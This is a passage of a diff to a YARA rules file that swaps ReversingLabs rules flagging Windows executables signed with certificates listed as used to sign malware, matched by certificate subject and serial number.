-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "41:2a:b2:a5:0e:80:28:dd:cb:c4:99:dd:f4:5f:20:45" and 1479340800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fudl" and ( pe.signatures [ i ] . serial == "00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" or pe.signatures [ i ] . serial == "d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" ) and 1612828800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0747F6A8C3542F954B113Fd98C7607Cf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D3356318924C8C42959Bf1D1574E6482 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "de5fbb40-7d41-5f3e-97c9-a6882c19ebb5"
+		id = "36b12300-6535-5644-9145-9f532b49a421"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14584-L14600"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9d5e5c98f3ef372532cfc4f544d5d3f620dc2e49d8b6e1c96df29d2a38042019"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7560-L7578"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a672054a776d0715fc888578bcb559d24ef54b4c523f7d49a39ded2586c3140a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18871,21 +43536,21 @@ rule REVERSINGLABS_Cert_Blocklist_0747F6A8C3542F954B113Fd98C7607Cf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "07:47:f6:a8:c3:54:2f:95:4b:11:3f:d9:8c:76:07:cf" and 1474329600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADV TOURS d.o.o." and ( pe.signatures [ i ] . serial == "00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" or pe.signatures [ i ] . serial == "d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" ) and 1613001600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2572B484Fa0A61Be7288D785D7Bda7D3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_31D852F5Fca1A5966B5Ed08A14825C54 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b1d71baa-9100-512d-91f4-7286a740e5f2"
+		id = "362a6eb7-f49e-502b-9870-522aea13e04b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14602-L14618"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d6b23ba706a640a1e76ad7ab0a70c845c9366ac8355eea5439f76f6993c9c6be"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7580-L7596"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8c98b856d53e6862e94042bb133f5739bddcec2e208e43961b23e244584c6ee4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18895,21 +43560,21 @@ rule REVERSINGLABS_Cert_Blocklist_2572B484Fa0A61Be7288D785D7Bda7D3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVA, OOO" and pe.signatures [ i ] . serial == "25:72:b4:84:fa:0a:61:be:72:88:d7:85:d7:bd:a7:d3" and 1495152000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BBT KLA d.o.o." and pe.signatures [ i ] . serial == "31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" and 1612396800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6726Bd04204746C46857887F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_17D99Cc2F5B29522D422332E681F3E18 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ef882d82-f535-57c3-9d45-8d47ecc7f607"
+		id = "0d0a58a4-353d-51f9-a739-a135d77357c9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14620-L14636"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "11d25dff7e05e6f97725e919cc6c978d7f2e64a91cf04b72461c71d592dfc2dc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7598-L7614"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "55cc1634cdc5209d68b98fdb0d9e97e0a34346cdcb10f243d13217cda01195f1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18919,21 +43584,21 @@ rule REVERSINGLABS_Cert_Blocklist_6726Bd04204746C46857887F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "67:26:bd:04:20:47:46:c4:68:57:88:7f" and 1474352405 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PKV Trading ApS" and pe.signatures [ i ] . serial == "17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" and 1613088000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4463D8B31E0F87C14233D4D0D2C487A0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6A568F85De2061F67Ded98707D4988Df : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eefd6fa2-7ed7-51d0-bddd-90f0727a93cc"
+		id = "962c3096-2c3d-5137-9637-b45d00b2ee9b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14638-L14654"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "04ce664fceb4a617294e860d5364d8a4ce8e055fd2baebb8be69f258d9c70ac7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7616-L7632"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "793be308a4df55c3b325e1ee3185159c4155f6dfabc311216d3763bd43680bd4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18943,21 +43608,21 @@ rule REVERSINGLABS_Cert_Blocklist_4463D8B31E0F87C14233D4D0D2C487A0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "44:63:d8:b3:1e:0f:87:c1:42:33:d4:d0:d2:c4:87:a0" and 1477612800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Apladis" and pe.signatures [ i ] . serial == "6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" and 1613001600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_387982605E542D6D52F231Ca6F5657Cc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_038Fc745523B41B40D653B83Aa381B80 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2d5731e1-b18b-544e-ae14-40d70b679618"
+		id = "3f7f9d58-3a7a-5f84-bf6e-795a9c8bcd38"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14656-L14672"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d55cfd45bc0d330c0ed433a882874e4633ffbaa0d68288bea9058fe269d75ed9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7634-L7650"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "016ca6dcb5c7c56c80e4486b84d97fb3869a959ef3e8392e4376a0a0de06092f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18967,21 +43632,21 @@ rule REVERSINGLABS_Cert_Blocklist_387982605E542D6D52F231Ca6F5657Cc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "38:79:82:60:5e:54:2d:6d:52:f2:31:ca:6f:56:57:cc" and 1475884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Optima" and pe.signatures [ i ] . serial == "03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" and 1606143708 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E0134C41E7Eda6863C4Eee5B003976Dd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_30Af0D0E6D8201A5369664C5Ebbb010F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "395c14fd-2fec-53ad-bc8e-2dd4bb3522d2"
+		id = "aaa31642-a0f4-5652-b3cd-c81cfb1ab127"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14674-L14692"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fbe34baf52e3fa7d7cdfcfaef9b8851c4cbeb46d17eeade61750e59cf0c13291"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7652-L7668"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "018e5a0fbeeaded2569b83e2f91230e0055a5ffa2059b7a064a5c2eda55ed2de"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18991,21 +43656,21 @@ rule REVERSINGLABS_Cert_Blocklist_E0134C41E7Eda6863C4Eee5B003976Dd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5000 LIMITED" and ( pe.signatures [ i ] . serial == "00:e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" or pe.signatures [ i ] . serial == "e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" ) and 1528070400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3N-\\xC5\\xA0PORT podjetje za in\\xC5\\xBEeniring, storitve in trgovino d.o.o." and pe.signatures [ i ] . serial == "30:af:0d:0e:6d:82:01:a5:36:96:64:c5:eb:bb:01:0f" and 1613433600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5B47A4739Dd8Ffe81D9B5307 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ac0A7B9420B369Af3Ddb748385B981 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9688b091-9a77-59c2-b7f9-a8b652201b8f"
+		id = "82d6c0f5-80d1-5003-a5c9-9eadd9654460"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14694-L14710"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5f35f520d4af26fa648553894a5b0db043d0c32302d94f531b6cb48691396a92"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7670-L7688"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2bc31eaa64be487cb85873a64b7462d90d1c28839def070ce5db7ae555383421"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19015,21 +43680,21 @@ rule REVERSINGLABS_Cert_Blocklist_5B47A4739Dd8Ffe81D9B5307 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5b:47:a4:73:9d:d8:ff:e8:1d:9b:53:07" and 1476953007 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tochka" and ( pe.signatures [ i ] . serial == "00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" or pe.signatures [ i ] . serial == "ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" ) and 1604620800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4F5A9Bf75Da76B949645475473793A7D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C167F04B338B1E8747B92C2197403C43 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "90cdf420-bdfc-509a-a64f-f30710f09f3b"
+		id = "0bf561ac-0283-557f-a685-4603e2b58273"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14712-L14728"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8c58d30b1b6ef80409d9da5f5f4bc26a8818b01cc388b5966c8b68ed0e4c5a2a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7690-L7708"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8e0a11efc739baefe23a3d77e4eefc9dc23c74821c91fc219822dbc5dbb468b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19039,21 +43704,21 @@ rule REVERSINGLABS_Cert_Blocklist_4F5A9Bf75Da76B949645475473793A7D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXEC CONTROL LIMITED" and pe.signatures [ i ] . serial == "4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" and 1553817600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and ( pe.signatures [ i ] . serial == "00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" or pe.signatures [ i ] . serial == "c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" ) and 1604361600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_081Df56C9A48D02571F08907 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9272607Cfc982B782A5D36C4B78F5E7B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4f4fb099-406a-5def-9a26-46c6807cfe7f"
+		id = "e3ad8f20-d12f-54e9-a6da-7aad28a10287"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14730-L14746"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "25d91f09e0731ab09a05855442b72589eb30e1c7d5e4c0a7af760eea540d786f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7710-L7728"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2b1d6f27fb513542589a5c9011e501a9d298282bba6882eac0fc7bf3e6ebb291"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19063,21 +43728,21 @@ rule REVERSINGLABS_Cert_Blocklist_081Df56C9A48D02571F08907 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "08:1d:f5:6c:9a:48:d0:25:71:f0:89:07" and 1474870728 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rada SP Z o o" and ( pe.signatures [ i ] . serial == "00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" or pe.signatures [ i ] . serial == "92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" ) and 1605139200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_77D5C1A3E623575999C74409Dc19753C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_45Eb9187A2505D8E6C842E6D366Ad0C8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8f8ce24d-8330-509a-a7a1-2727c6f8bdd9"
+		id = "1b8390aa-16b9-558b-aee8-e30fc7100af4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14748-L14764"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "54921ce39a0876511b33ac6fa088c3342e2ea7fa037423fe72825bfe9c83bce6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7730-L7746"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4ae755e814ae2488d4bd6b8136ab6d78e4809a2ddacb7f88cf1d2b64c1488898"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19087,21 +43752,21 @@ rule REVERSINGLABS_Cert_Blocklist_77D5C1A3E623575999C74409Dc19753C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "77:d5:c1:a3:e6:23:57:59:99:c7:44:09:dc:19:75:3c" and 1475884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BAKERA s.r.o." and pe.signatures [ i ] . serial == "45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" and 1607040000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E9756B3F38B1172Ea89Fdbdfdba5F979 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_56Fff139Df5Ae7E788E5D72196Dd563A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "77d7470c-0c60-5ef4-b1d9-35642c147afe"
+		id = "4f34fd37-908c-573c-ba53-5ab622589e88"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14766-L14784"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "997a9433f907896d82f22ae323bf9cfe9aa04a2a49c5505e98adbb34277fcc15"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7748-L7764"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4b58c83901605d8b43519f1bc2d4ac8dc10c794f027681378b2bee2a8ff81604"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19111,21 +43776,21 @@ rule REVERSINGLABS_Cert_Blocklist_E9756B3F38B1172Ea89Fdbdfdba5F979 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kreamer Ltd" and ( pe.signatures [ i ] . serial == "00:e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" or pe.signatures [ i ] . serial == "e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" ) and 1492732800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cifromatika LLC" and pe.signatures [ i ] . serial == "56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" and 1606435200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_09Fb28 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E161F76Da3B5E4623892C8E6Fda1Ea3D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e7701457-c6cd-5b20-b227-8a9cdcde8213"
+		id = "386c81ef-87aa-514e-81d7-dddfb90e0dc2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14786-L14802"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5ed65d33b73977e869460ba51271aff94811fa2f41e4a2993c47233add2f38dd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7766-L7784"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "883545593b48aa11c11f7fa1a1f77c62321ea86067f1ed108dcd00c8c6cd3495"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19135,21 +43800,21 @@ rule REVERSINGLABS_Cert_Blocklist_09Fb28 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "New Dial spa" and pe.signatures [ i ] . serial == "09:fb:28" and 1046968418 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TGN Nedelica d.o.o." and ( pe.signatures [ i ] . serial == "00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" or pe.signatures [ i ] . serial == "e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" ) and 1604966400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_197Dc32D915458953562D2Fe78Bf2468 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Ae5B177Ac3A7Ce2Aadf1C891B574924 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9c25410f-6a3d-5e6e-b270-ccec3be34e80"
+		id = "c72b8b2a-3e49-5ac3-ab4d-55b86ce7f061"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14804-L14820"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e61284a74765592fe97b90ca1c260efa46ea31286e6d09ab32d6c664b8271f2a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7786-L7804"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "03ac299459a1aaf2e4a2e62884cd321e16100fee78b4b0e271acdd8a4e32525c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19159,21 +43824,21 @@ rule REVERSINGLABS_Cert_Blocklist_197Dc32D915458953562D2Fe78Bf2468 : INFO FILE
 		importance = 25
 
 	condition:
